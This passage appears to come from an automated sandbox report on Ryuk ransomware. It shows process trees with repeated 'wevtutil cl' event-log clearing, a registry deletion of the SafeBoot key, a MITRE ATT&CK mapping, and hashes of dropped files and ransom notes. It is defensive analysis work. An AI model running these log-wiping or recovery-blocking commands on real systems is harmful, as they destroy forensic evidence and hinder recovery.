- Clears Windows event logs
PID:1320

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationDS"
3⤵
- Clears Windows event logs
PID:3308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationDeviceProxy"
3⤵
- Clears Windows event logs
PID:1284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationMP4"
3⤵
- Clears Windows event logs
PID:2484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationMediaEngine"
3⤵
- Clears Windows event logs
PID:3512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformance"
3⤵
- Clears Windows event logs
PID:1676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformanceCore"
3⤵
- Clears Windows event logs
PID:4644

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPipeline"
3⤵
- Clears Windows event logs
PID:4548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPlatform"
3⤵
- Clears Windows event logs
PID:5064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationSrcPrefetch"
3⤵
- Clears Windows event logs
PID:1620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
3⤵
- Clears Windows event logs
PID:4176

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Admin"
3⤵
- Clears Windows event logs
PID:3768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Debug"
3⤵
- Clears Windows event logs
PID:3832

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Operational"
3⤵
- Clears Windows event logs
PID:820

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
3⤵
- Clears Windows event logs
PID:3652

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
3⤵
- Clears Windows event logs
PID:4448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
3⤵
- Clears Windows event logs
PID:3212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
3⤵
- Clears Windows event logs
PID:4508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
3⤵
- Clears Windows event logs
PID:4496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IE/Diagnostic"
3⤵
- Clears Windows event logs
PID:3496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
3⤵
- Clears Windows event logs
PID:5044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
3⤵
- Clears Windows event logs
PID:3736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
3⤵
- Clears Windows event logs
PID:1108

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
3⤵
- Clears Windows event logs
PID:3936

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
1⤵
PID:3288

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:836

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Indicator Removal on Host

T1070

File Deletion

T1107

File Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.txt
Filesize
1KB

MD5
f69127370e1f1aede86e881dd446f6aa

SHA1
65298f80e3b97f59ea45179463ab9c5cc3ee9337

SHA256
da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

SHA512
5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ryuk.exe
Filesize
885KB

MD5
6a5bf25ff4f72ebca91280ffda057260

SHA1
722063331acdbfc93ccbfacbec045800a835dd9e

SHA256
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

SHA512
64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

Download Submit
C:\ProgramData\RYUKID
Filesize
8B

MD5
85462c5c76a1f9effd9d24af445182da

SHA1
8b5f57029bd8ac3c5b182608de6691d6e1492b3f

SHA256
8ade6464383a886e84e3d42c17f5f906d2b50e87963b345a6d45a714fd7442c4

SHA512
828320205e9766d12ee2a7e052230a206eb1a8c8dc53ce3c406857bae05687431fe7237d59c3fa9559a71d925fc8b96f4f28b40d67ce610b7e0247c5671cc6e5

Download Submit
C:\ProgramData\RyukReadMe.html
Filesize
152B

MD5
a641bf8ac8307aad57ecab53872e67db

SHA1
6fa8d69a859c34b8e75223ed8f426dbdf3d03df7

SHA256
9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce

SHA512
7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4

Download Submit
C:\ProgramData\RyukReadMe.txt
Filesize
1KB

MD5
f69127370e1f1aede86e881dd446f6aa

SHA1
65298f80e3b97f59ea45179463ab9c5cc3ee9337

SHA256
da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

SHA512
5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
cf30a97d06523d5819b46c7db7b85129

SHA1
e8022ad32c76df2df6eae5118b45b96fd59e8453

SHA256
b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d

SHA512
2fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
cf30a97d06523d5819b46c7db7b85129

SHA1
e8022ad32c76df2df6eae5118b45b96fd59e8453

SHA256
b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d

SHA512
2fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
cf30a97d06523d5819b46c7db7b85129

SHA1
e8022ad32c76df2df6eae5118b45b96fd59e8453

SHA256
b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d

SHA512
2fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
e14553b25f8951635bc37c90beffecc0

SHA1
60d9f6ff88506a9fcd36342fa2698025e990a673

SHA256
8227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be

SHA512
5a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
e14553b25f8951635bc37c90beffecc0

SHA1
60d9f6ff88506a9fcd36342fa2698025e990a673

SHA256
8227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be

SHA512
5a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
e14553b25f8951635bc37c90beffecc0

SHA1
60d9f6ff88506a9fcd36342fa2698025e990a673

SHA256
8227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be

SHA512
5a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3

Download Submit
C:\ProgramData\ryuk.exe
Filesize
885KB

MD5
6a5bf25ff4f72ebca91280ffda057260

SHA1
722063331acdbfc93ccbfacbec045800a835dd9e

SHA256
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

SHA512
64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID
Filesize
8B

MD5
85462c5c76a1f9effd9d24af445182da

SHA1
8b5f57029bd8ac3c5b182608de6691d6e1492b3f

SHA256
8ade6464383a886e84e3d42c17f5f906d2b50e87963b345a6d45a714fd7442c4

SHA512
828320205e9766d12ee2a7e052230a206eb1a8c8dc53ce3c406857bae05687431fe7237d59c3fa9559a71d925fc8b96f4f28b40d67ce610b7e0247c5671cc6e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1
Filesize
2KB

MD5
cf30a97d06523d5819b46c7db7b85129

SHA1
e8022ad32c76df2df6eae5118b45b96fd59e8453

SHA256
b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d

SHA512
2fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2
Filesize
292B

MD5
e14553b25f8951635bc37c90beffecc0

SHA1
60d9f6ff88506a9fcd36342fa2698025e990a673

SHA256
8227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be

SHA512
5a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
Filesize
885KB

MD5
6a5bf25ff4f72ebca91280ffda057260

SHA1
722063331acdbfc93ccbfacbec045800a835dd9e

SHA256
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

SHA512
64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

Download Submit